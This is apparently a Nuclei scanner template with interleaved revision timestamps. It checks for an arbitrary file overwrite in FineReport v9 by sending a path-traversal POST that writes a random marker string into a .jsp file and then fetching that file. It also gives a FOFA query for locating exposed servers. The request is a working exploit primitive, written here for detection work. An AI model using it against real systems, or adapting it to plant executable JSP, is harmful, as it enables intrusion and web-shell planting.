2023-08-22 11:27:51 +00:00
|
|
|
id: fine-report-v9-file-upload
|
|
|
|
|
|
|
|
|
|
info:
|
|
|
|
|
name: FineReport v9 Arbitrary File Overwrite
|
|
|
|
|
author: SleepingBag945
|
|
|
|
|
severity: critical
|
|
|
|
|
reference:
|
2023-08-22 11:33:04 +00:00
|
|
|
- https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.
|
|
|
|
|
metadata:
|
2023-08-23 13:26:57 +00:00
|
|
|
max-request: 2
|
2023-10-14 11:27:55 +00:00
|
|
|
fofa-query: app="帆软-FineReport"
|
2023-08-22 11:31:02 +00:00
|
|
|
tags: finereport,fileupload,intrusive
|
2023-08-22 11:27:51 +00:00
|
|
|
variables:
|
|
|
|
|
string: '{{rand_base(8, "abc")}}'
|
2023-08-23 13:20:56 +00:00
|
|
|
filename: '{{rand_base(8)}}'
|
2023-08-22 11:27:51 +00:00
|
|
|
|
|
|
|
|
http:
|
|
|
|
|
- raw:
|
|
|
|
|
- |
|
2023-08-23 13:20:56 +00:00
|
|
|
POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{{filename}}.jsp HTTP/1.1
|
2023-08-22 11:27:51 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
|
Content-Type: text/xml;charset=UTF-8
|
|
|
|
|
|
|
|
|
|
{"__CONTENT__":"{{string}}","__CHARSET__":"UTF-8"}
|
|
|
|
|
- |
|
2023-08-23 13:20:56 +00:00
|
|
|
GET /WebReport/{{filename}}.jsp HTTP/1.1
|
2023-08-22 11:27:51 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
|
- type: word
|
|
|
|
|
part: body_2
|
|
|
|
|
words:
|
|
|
|
|
- "{{string}}"
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
|
# digest: 4a0a00473045022100f9d16be4fb4062058a386fed5480ea11ca5954c365181bee55a7f4153a6ba13c02207fbb6aacd69768b7019873949262ce0f1ab85f83cee6892b50bb4bbd1edaf4de:922c64590222798bb761d5b6d8e72950
|
